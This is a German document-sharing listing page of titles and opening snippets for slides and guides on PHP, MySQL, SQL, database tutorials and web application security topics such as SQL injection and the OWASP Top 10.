PHP und MySQL. Integration von MySQL in PHP. Zellescher Weg 12 Willers-Bau A109 Tel. +49 351-463 - 32424. Michael Kluge (michael.kluge@tu-dresden.

PHP und MySQL. Integration von MySQL in PHP. Zellescher Weg 12 Willers-Bau A109 Tel. +49 351-463 - 32424. Michael Kluge (michael.kluge@tu-dresden. Zentrum für Informationsdienste und Hochleistungsrechnen (ZIH) PHP und MySQL Integration von MySQL in PHP Zellescher Weg 12 Willers-Bau A109 Tel. +49 351-463 - 32424 (michael.kluge@tu-dresden.de) MySQL

Mehr

Thema: SQL-Injection (SQL-Einschleusung):

Thema: SQL-Injection (SQL-Einschleusung): Thema: SQL-Injection (SQL-Einschleusung): Allgemein: SQL (Structured Query Language) ist eine Datenbanksprache zur Definition von Datenstrukturen in Datenbanken sowie zum Bearbeiten (Einfügen, Verändern,

Mehr

am Beispiel - SQL Injection

am Beispiel - SQL Injection am Beispiel - SQL Injection Einführung Warum ist Sicherheit ein Software Thema? Sicherheit in heutigen Softwareprodukten & Trends OWASP Top 10 Kategorien Hacking Demo SQL Injection: der Weg zu den Daten

Mehr

Albert HAYR Linux, IT and Open Source Expert and Solution Architect. Open Source professionell einsetzen

Albert HAYR Linux, IT and Open Source Expert and Solution Architect. Open Source professionell einsetzen Open Source professionell einsetzen 1 Mein Background Ich bin überzeugt von Open Source. Ich verwende fast nur Open Source privat und beruflich. Ich arbeite seit mehr als 10 Jahren mit Linux und Open Source.

Mehr

Magento Application Security. Anna Völkl / @rescueann

Magento Application Security. Anna Völkl / @rescueann Magento Application Security Anna Völkl / @rescueann Anna Völkl @rescueann Magento Certified Developer PHP seit 2004 Magento seit 2011 IT & Telekommunikation (BSc), IT-Security (MSc) LimeSoda (Wien, AT)

Mehr

PostgreSQL unter Debian Linux

PostgreSQL unter Debian Linux Einführung für PostgreSQL 7.4 unter Debian Linux (Stand 30.04.2008) von Moczon T. und Schönfeld A. Inhalt 1. Installation... 2 2. Anmelden als Benutzer postgres... 2 2.1 Anlegen eines neuen Benutzers...

Mehr

Dokumentation für das Web-basierte Abkürzungsverzeichnis (Oracle mod_plsql / Apache)

Dokumentation für das Web-basierte Abkürzungsverzeichnis (Oracle mod_plsql / Apache) Dokumentation für das Web-basierte Abkürzungsverzeichnis (Oracle mod_plsql / Apache) vom 8. August 2005 Seite 1 / 7 1.System-Voraussetzungen Um dieses System zu verwenden, muß Oracles HTTP-Server mit dem

Mehr

TimeMachine. Installation und Konfiguration. Version 1.4. Stand 21.11.2013. Dokument: install.odt. Berger EDV Service Tulbeckstr.

TimeMachine. Installation und Konfiguration. Version 1.4. Stand 21.11.2013. Dokument: install.odt. Berger EDV Service Tulbeckstr. Installation und Konfiguration Version 1.4 Stand 21.11.2013 TimeMachine Dokument: install.odt Berger EDV Service Tulbeckstr. 33 80339 München Fon +49 89 13945642 Mail rb@bergertime.de Versionsangaben Autor

Mehr

Dynamisches SQL. Folien zum Datenbankpraktikum Wintersemester 2009/10 LMU München

Dynamisches SQL. Folien zum Datenbankpraktikum Wintersemester 2009/10 LMU München Kapitel 4 Dynamisches SQL Folien zum Datenbankpraktikum Wintersemester 2009/10 LMU München 2008 Thomas Bernecker, Tobias Emrich unter Verwendung der Folien des Datenbankpraktikums aus dem Wintersemester

Mehr

How to install freesshd

How to install freesshd Enthaltene Funktionen - Installation - Benutzer anlegen - Verbindung testen How to install freesshd 1. Installation von freesshd - Falls noch nicht vorhanden, können Sie das Freeware Programm unter folgendem

Mehr

Mengenvergleiche: Alle Konten außer das, mit dem größten Saldo.

Mengenvergleiche: Alle Konten außer das, mit dem größten Saldo. Mengenvergleiche: Mehr Möglichkeiten als der in-operator bietet der θany und der θall-operator, also der Vergleich mit irgendeinem oder jedem Tupel der Unteranfrage. Alle Konten außer das, mit dem größten

Mehr

Fakultät für Informatik & Wirtschaftsinformatik DB & IS II - SS 2015. Metadaten

Fakultät für Informatik & Wirtschaftsinformatik DB & IS II - SS 2015. Metadaten Fakultät für Informatik & Wirtschaftsinformatik Metadaten Metadaten sind Daten über Daten Data-Dictionary speichert Informationen über die Struktur der Daten, z.b.: Tabellen, Spalten, Datentypen Primär-

Mehr

Ein Ausflug zu ACCESS

Ein Ausflug zu ACCESS Ein Ausflug zu ACCESS Die folgenden Folien zeigen beispielhaft, wie man sein DB- Wissen auf ACCESS übertragen kann betrachtet wird ACCESS 2002, da gerade im Bereich der Nutzung von SQL hier einiges nachgearbeitet

Mehr

PHP-5-Zertifizierung. Block 12 Security.

PHP-5-Zertifizierung. Block 12 Security. PHP-5-Zertifizierung Block 12 Security Allgemeine Regeln Alle Eingaben (von außen) sind (potenziell) böse Eingaben filtern/validieren Ausgaben escapen Trauen Sie nichts von außen! GET-/POST-Daten Cookies

Mehr

Transaktionen in der Praxis. Dr. Karsten Tolle

Transaktionen in der Praxis. Dr. Karsten Tolle Transaktionen in der Praxis Dr. Karsten Tolle Praxisbeispiel in Java Connection con = null; try { con = DriverManager.getConnection("jdbc:db2:sample"); } catch (Exception e) { e.printstacktrace(); } con.setautocommit(false);

Mehr

Hacking. InfoPoint 07.12.2005. Jörg Wüthrich

Hacking. InfoPoint 07.12.2005. Jörg Wüthrich Hacking InfoPoint 07.12.2005 Jörg Wüthrich Inhalte Rund um das Thema Hacking Angriffs-Techniken Session Handling Cross Site Scripting (XSS) SQL-Injection Buffer Overflow 07.12.2005 Infopoint - Hacking

Mehr

Wie sichert man APEX-Anwendungen gegen schädliche Manipulationen und unerwünschte Zugriffe ab?

Wie sichert man APEX-Anwendungen gegen schädliche Manipulationen und unerwünschte Zugriffe ab? APEX aber sicher Wie sichert man APEX-Anwendungen gegen schädliche Manipulationen und unerwünschte Zugriffe ab? Carola Berzl BASEL BERN BRUGG GENF LAUSANNE ZÜRICH DÜSSELDORF FRANKFURT A.M. FREIBURG I.BR.

Mehr

Oracle SQL Tutorium - Wiederholung DB I -

Oracle SQL Tutorium - Wiederholung DB I - Oracle SQL Tutorium - Wiederholung DB I - (Version 2.6 vom 24.2.2015) Einleitung Im Folgenden sind zur Wiederholung eine Reihe von SQL-Übungsaufgaben zu lösen. Grundlage für die Aufgaben ist die Mondial

Mehr

ZSDGMDZFGW... Zehn Sicherheitsprobleme, die gerne mit dem ZendFramework gebaut werden. Ben Fuhrmannek #phpug-köln 2.10.2009

ZSDGMDZFGW... Zehn Sicherheitsprobleme, die gerne mit dem ZendFramework gebaut werden. Ben Fuhrmannek #phpug-köln 2.10.2009 ZSDGMDZFGW Zehn Sicherheitsprobleme, die gerne mit dem ZendFramework gebaut werden Ben Fuhrmannek #phpug-köln 2.10.2009 Über mich Informatiker Entwickler IT Security 2 TOC Aufbau ZF Problem 1 bis 10 3

Mehr

Datenbanksysteme SS 2007

Datenbanksysteme SS 2007 Datenbanksysteme SS 2007 Frank Köster (Oliver Vornberger) Institut für Informatik Universität Osnabrück Kapitel 9c: Datenbankapplikationen Architektur einer Web-Applikation mit Servlets, JSPs und JavaBeans

Mehr

Motivation. Inhalt. URI-Schemata (1) URI-Schemata (2)

Motivation. Inhalt. URI-Schemata (1) URI-Schemata (2) 14. URIs Uniform Resource Identifier 14-1 14. URIs Uniform Resource Identifier 14-2 Motivation Das WWW ist ein Hypermedia System. Es enthält: Resourcen (Multimedia Dokumente) Verweise (Links) zwischen

Mehr

Wie funktioniert das WWW? Sicher im WWW

Wie funktioniert das WWW? Sicher im WWW Wie funktioniert das WWW? Sicher im WWW Der normale Aufruf 1. Browserprogramm starten 2. Adresse eintippen, z.b. : ich-hab-doch-nichts-zu-verbergen.de 3. Der Browser ändert die Adresse auf: http://ich-hab-doch-nichts-zu-verbergen.de/

Mehr

Sicherheit in Datenbank- und Informationssystemen

Sicherheit in Datenbank- und Informationssystemen Sicherheit in Datenbank- und Informationssystemen Ingo Frommholz Universität Duisburg-Essen ingo.frommholz@uni-due.de Datenbank-Praktikum 12. Juli 2006 UNIVERSITÄT D U I S B U R G E S S E N Inhalt 1 Sicherheit

Mehr

SQL-Injection in the news Stand: 17.06.2006 24:00

SQL-Injection in the news Stand: 17.06.2006 24:00 Vernetzte Unternehmen I SQL-Injection Prof. Dr. H. Strack, Dipl.-Inf.(FH) Ch. Karich SQL-Injection in the news Stand: 17.06.2006 24:00 Heise-Newsticker: 02.06.06: SQL-Injection-Lücke in MySQL gestopft

Mehr

Dieses Dokument soll dem Administrator helfen, die ENiQ-Software als Client auf dem Zielrechner zu installieren und zu konfigurieren.

Dieses Dokument soll dem Administrator helfen, die ENiQ-Software als Client auf dem Zielrechner zu installieren und zu konfigurieren. CLIENT INSTALLATION DES ENIQ ACCESSMANAGEMENTS Dieses Dokument soll dem Administrator helfen, die ENiQ-Software als Client auf dem Zielrechner zu installieren und zu konfigurieren. Ein Client kann in drei

Mehr

Welche Gefahren gehen vom Firmenauftritt im Internet aus?

Welche Gefahren gehen vom Firmenauftritt im Internet aus? Die Webseite als Eintrittspunkt Welche Gefahren gehen vom Firmenauftritt im Internet aus? Bekannt gewordene Schwachstellen & Angriffe Bekannt gewordene Schwachstellen & Angriffe Quelle: http://www.vulnerability-db.com/dev/index.php/2014/02/06/german-telekom-bug-bounty-3x-remote-vulnerabilities/

Mehr

Ensemble Security. Karin Schatz-Cairoli Senior Sales Engineer

Ensemble Security. Karin Schatz-Cairoli Senior Sales Engineer Ensemble Security Karin Schatz-Cairoli Senior Sales Engineer Security Wozu? Entwickler Externe Person Daten Anwender Administrator Unberechtigter Zugriff Absichtlich oder unabsichtlich Fehler vertuschen

Mehr

SQL für Trolle. mag.e. Dienstag, 10.2.2009. Qt-Seminar

SQL für Trolle. mag.e. Dienstag, 10.2.2009. Qt-Seminar Qt-Seminar Dienstag, 10.2.2009 SQL ist......die Abkürzung für Structured Query Language (früher sequel für Structured English Query Language )...ein ISO und ANSI Standard (aktuell SQL:2008)...eine Befehls-

Mehr

Frankfurt, 15.05.2012

Frankfurt, 15.05.2012 DOAG SIG Middleware Frankfurt, 15.05.2012 Jan Peter Timmermann PITSS GmbH 1 Copyright 2011 PITSS GmbH www.pitss.com Agenda Motivation für diesen Vortrag Sicherheitsrisiken im Netz Was war bisher möglich

Mehr

PHP-Schwachstellen und deren Ausnutzung

PHP-Schwachstellen und deren Ausnutzung PHP-Schwachstellen und deren Ausnutzung 44. DFN Betriebstagung / 7. Februar 2006 DFN-CERT Services GmbH Jan Kohlrausch / CSIRT Gliederung Grundlagen HTTP und PHP Anatomie typischer Schwachstellen in PHP-Skripten

Mehr

SQL, MySQL und FileMaker

SQL, MySQL und FileMaker SQL, MySQL und FileMaker Eine kurze Einführung in SQL Vorstellung von MySQL & phpmyadmin Datenimport von MySQL in FileMaker Autor: Hans Peter Schläpfer Was ist SQL? «Structured Query Language» Sprache

Mehr

Online Banking System

Online Banking System Online Banking System Pflichtenheft im Rahmen des WI-Praktikum bei Thomas M. Lange Fachhochschule Giessen-Friedberg Fachbereich MNI Studiengang Informatik Erstellt von: Eugen Riske Yueksel Korkmaz Alper

Mehr

JDBC. Es kann z.b. eine ODBC-Treiberverbindung eingerichtet werden, damit das JAVA-Programm auf eine ACCESS-DB zugreifen kann.

JDBC. Es kann z.b. eine ODBC-Treiberverbindung eingerichtet werden, damit das JAVA-Programm auf eine ACCESS-DB zugreifen kann. JDBC in 5 Schritten JDBC (Java Database Connectivity) ist eine Sammlung von Klassen und Schnittstellen, mit deren Hilfe man Verbindungen zwischen Javaprogrammen und Datenbanken herstellen kann. 1 Einrichten

Mehr

Web Application Testing: Wie erkenne ich, ob meine Website angreifbar ist?

Web Application Testing: Wie erkenne ich, ob meine Website angreifbar ist? Pallas Security Colloquium Web Application Testing: Wie erkenne ich, ob meine Website angreifbar ist? 18.10.2011 Referent: Tim Kretschmann Senior System Engineer, CISO Pallas GmbH Hermülheimer Straße 8a

Mehr

am Beispiel - SQL Injection

am Beispiel - SQL Injection am Beispiel - SQL Injection Einführung } Warum ist Sicherheit ein Software Thema? } Sicherheit in heutigen Softwareprodukten & Trends } OWASP Top 10 Kategorien Hacking Demo } SQL Injection: der Weg zu

Mehr

ORM & OLAP. Object-oriented Enterprise Application Programming Model for In-Memory Databases. Sebastian Oergel

ORM & OLAP. Object-oriented Enterprise Application Programming Model for In-Memory Databases. Sebastian Oergel ORM & OLAP Object-oriented Enterprise Application Programming Model for In-Memory Databases Sebastian Oergel Probleme 2 Datenbanken sind elementar für Business-Anwendungen Gängiges Datenbankparadigma:

Mehr

SQL-INJECTIONS. N E T D E V E L O P E R S G R O U P B E R L I N B R A N D E N B U R G, 0 5. 0 4. 2 0 1 2

SQL-INJECTIONS. N E T D E V E L O P E R S G R O U P B E R L I N B R A N D E N B U R G, 0 5. 0 4. 2 0 1 2 SQL-INJECTIONS. N E T D E V E L O P E R S G R O U P B E R L I N B R A N D E N B U R G, 0 5. 0 4. 2 0 1 2 Wie sind die nur wieder an meine Kreditkartendaten gekommen? http://www.testedich.de/quiz29/picture/pic_1312394875_7.jpg

Mehr

PHP - Projekt Personalverwaltung. Erstellt von James Schüpbach

PHP - Projekt Personalverwaltung. Erstellt von James Schüpbach - Projekt Personalverwaltung Erstellt von Inhaltsverzeichnis 1Planung...3 1.1Datenbankstruktur...3 1.2Klassenkonzept...4 2Realisierung...5 2.1Verwendete Techniken...5 2.2Vorgehensweise...5 2.3Probleme...6

Mehr

Schwachstellenanalyse 2012

Schwachstellenanalyse 2012 Schwachstellenanalyse 2012 Sicherheitslücken und Schwachstellen in Onlineshops Andre C. Faßbender Schwachstellenforschung Faßbender 13.01.2012 Inhaltsverzeichnis 1. Abstract... 3 2. Konfiguration der getesteten

Mehr

Daten in der Cloud mit Access, Office 365 und Apps foroffice Dirk Eberhardt

Daten in der Cloud mit Access, Office 365 und Apps foroffice Dirk Eberhardt SOFTWARE- UND WEB-LÖSUNGEN Daten in der Cloud mit Access, Office 365 und Apps foroffice Dirk Eberhardt Agenda Was ist Office 365? Ab in die Cloud Bestehende Access-Anwendung plusmm Datenzugriff von lokal

Mehr

Whitepaper. Produkt: combit Relationship Manager. Datensatzhistorie mit dem SQL Server 2000 und 2005. combit GmbH Untere Laube 30 78462 Konstanz

Whitepaper. Produkt: combit Relationship Manager. Datensatzhistorie mit dem SQL Server 2000 und 2005. combit GmbH Untere Laube 30 78462 Konstanz combit GmbH Untere Laube 30 78462 Konstanz Whitepaper Produkt: combit Relationship Manager Datensatzhistorie mit dem SQL Server 2000 und 2005 Datensatzhistorie mit dem SQL Server 2000 und 2005-2 - Inhalt

Mehr

SQL (Structured Query Language) Schemata Datentypen

SQL (Structured Query Language) Schemata Datentypen 2 SQL Sprachelemente Grundlegende Sprachelemente von SQL. 2.1 Übersicht Themen des Kapitels SQL Sprachelemente Themen des Kapitels SQL (Structured Query Language) Schemata Datentypen Im Kapitel SQL Sprachelemente

Mehr

ESB - Elektronischer Service Bericht

ESB - Elektronischer Service Bericht Desk Software & Consulting GmbH ESB - Elektronischer Service Bericht Dokumentation des elektronischen Serviceberichts Matthias Hoffmann 25.04.2012 DESK Software und Consulting GmbH Im Heerfeld 2-4 35713

Mehr

Departement Wirtschaft. IT Forensics in action against malicious Software of the newest generation

Departement Wirtschaft. IT Forensics in action against malicious Software of the newest generation Departement Wirtschaft IT Forensics in action against malicious Software of the newest generation Dipl. Ing. Uwe Irmer IT Security- Schnappschüsse 2 Malware der neuesten Generation Professionalität- wer

Mehr

WEBAPPLIKATIONEN MIT PHP. Wo gibt es Hilfe? Wie fang ich an?

WEBAPPLIKATIONEN MIT PHP. Wo gibt es Hilfe? Wie fang ich an? WEBAPPLIKATIONEN MIT PHP Wo gibt es Hilfe? Wie fang ich an? Tools Webapplikationen bestehen aus Textdateien Lassen sich in Texteditoren schreiben Alternativen: Eclipse (PDT) Netbeans (Dynamic Languages)

Mehr

DB2 Kurzeinführung (Windows)

DB2 Kurzeinführung (Windows) DB2 Kurzeinführung (Windows) Michaelsen c 25. Mai 2010 1 1 Komponenten von DB2 DB2 bietet zahlreiche graphische Oberflächen für die Verwaltung der verschiedenen Komponenten und Anwendungen. Die wichtigsten

Mehr

Secure Programming vs. Secure Development

Secure Programming vs. Secure Development Secure Programming vs. Secure Development Niklaus Schild Senior Consultant Niklaus.schild@trivadis.com Zürich, 10.Juni 2010 Basel Baden Bern Lausanne Zürich Düsseldorf Frankfurt/M. Freiburg i. Br. Hamburg

Mehr

Konfiguration Firewall (Zyxel Zywall 10) (von Gruppe Schraubenmeier)

Konfiguration Firewall (Zyxel Zywall 10) (von Gruppe Schraubenmeier) Konfiguration Firewall (Zyxel Zywall 10) (von Gruppe Schraubenmeier) Firewall über Seriellen Anschluss mit Computer verbinden und Netzteil anschliessen. Programm Hyper Terminal (Windows unter Start Programme

Mehr

2. Einrichtung der ODBC-Schnittstelle aus orgamax (für 32-bit-Anwendungen)

2. Einrichtung der ODBC-Schnittstelle aus orgamax (für 32-bit-Anwendungen) 1. Einführung: Über den ODBC-Zugriff können Sie bestimmte Daten aus Ihren orgamax-mandanten in anderen Anwendungen (beispielsweise Microsoft Excel oder Microsoft Access) einlesen. Dies bietet sich beispielsweise

Mehr

Dipl. Inf. Dipl. Math. Y. Orkunoglu Datum: 11.09.2009

Dipl. Inf. Dipl. Math. Y. Orkunoglu Datum: 11.09.2009 Hochschule Darmstadt DATENBANKEN Fachbereich Informatik Praktikum 3 Dipl. Inf. Dipl. Math. Y. Orkunoglu Datum: 11.09.2009 PL/SQL Programmierung Anwendung des Cursor Konzepts und Stored Procedures Und Trigger

Mehr

Externe Authentifizierung. Externe Authentifizierung IACBOX.COM. Version 2.0.1 Deutsch 23.05.2014

Externe Authentifizierung. Externe Authentifizierung IACBOX.COM. Version 2.0.1 Deutsch 23.05.2014 Version 2.0.1 Deutsch 23.05.2014 In diesem HOWTO wird beschrieben wie Sie verschiedene Backend's wie SQL Server, Radius Server, Active Directory etc. zur Authentifizierung der Benutzer an die IAC-BOX anbinden.

Mehr

itsc Admin-Tag OWASP Top 10 Tobias Ellenberger COO & Co-Partner OneConsult GmbH 2013 OneConsult GmbH www.oneconsult.com

itsc Admin-Tag OWASP Top 10 Tobias Ellenberger COO & Co-Partner OneConsult GmbH 2013 OneConsult GmbH www.oneconsult.com itsc Admin-Tag OWASP Top 10 Tobias Ellenberger COO & Co-Partner OneConsult GmbH 13.03.2013 Agenda Vorstellung Open Web Application Security Project (OWASP) Die OWASP Top 10 (2013 RC1) OWASP Top 3 in der

Mehr

Informatives zur CAS genesisworld-administration

Informatives zur CAS genesisworld-administration Informatives zur CAS genesisworld-administration Inhalt dieser Präsentation Loadbalancing mit CAS genesisworld Der CAS Updateservice Einführung in Version x5 Konfigurationsmöglichkeit Sicherheit / Dienstübersicht

Mehr

Advanced Web Hacking. Matthias Luft Security Research mluft@ernw.de

Advanced Web Hacking. Matthias Luft Security Research mluft@ernw.de Advanced Web Hacking Matthias Luft Security Research mluft@ernw.de ERNW GmbH. Breslauer Str. 28. D-69124 Heidelberg. www.ernw.de 6/23/2010 1 ERNW GmbH Sicherheitsdienstleister im Beratungs- und Prüfungsumfeld

Mehr

Authentication Policy. Konfigurationsbeispiel ZyXEL ZyWALL USG-Serie. Juni 2010 / HAL

Authentication Policy. Konfigurationsbeispiel ZyXEL ZyWALL USG-Serie. Juni 2010 / HAL Authentication Policy Konfigurationsbeispiel ZyXEL ZyWALL USG-Serie Juni 2010 / HAL LOKALE USER DATENBANK Über Authentication Policy verknüpft man ZyWALL-Dienste und Benutzer so, dass die Nutzung der Dienste

Mehr